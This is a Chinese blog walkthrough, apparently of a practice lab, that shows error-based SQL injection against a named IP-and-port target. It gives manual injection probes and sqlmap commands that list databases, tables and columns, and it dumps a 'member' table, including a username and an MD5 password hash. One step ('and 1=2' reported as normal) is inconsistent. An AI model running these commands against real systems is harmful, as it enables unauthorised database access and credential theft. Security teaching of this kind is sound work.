我们这期的主题报错盲注,我们就得用SQLMAP进行报错盲注的漏洞利用
原文是带图的,要看有图的划到最下方有我博客链接
对站点http://219.153.49.228:41592/new_list.php?id=1进行测试
先手工判断一下这个是不是注入点
在id=1后面加‘后报错
添加and 1=1正常
添加and1=2正常
添加id=-1异常
使用SQLMAP扫描是否存在注入点
sqlmap.py -u "http://219.153.49.228:41592/new_list.php?id=1"
输入y回车
前面的sqlmap.py是文件路径,如果你的sqlmap文件名不叫sqlmap.py叫mysqlmap.py那就改成mysqlmap.py,如果你使用的是kali里面的sqlmap那就把后缀.py去掉
sqlmap.py -u "http://219.153.49.228:41592/new_list.php?id=1" --dbs 查找数据库
选择stormgroup,因为其他表都是MySQL自带的
sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup --tables扫描出表为member
sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup -T member --columns 查找出name 和password
sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup -T member -C "name,password,status" --dump 查出用户名为mozhe ,password为3c48eb99af674cdec2686f9c264211a3
md5解密,即成功的完成了一次报错盲注
转载请注明原站文章链接和作者
渗透千万条,授权第一条,谨记
原文博客链接:https://www.sakuar.cn/report-errors/
本文原创,这个博客站是我的,现在发的是跟我博客的一样
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。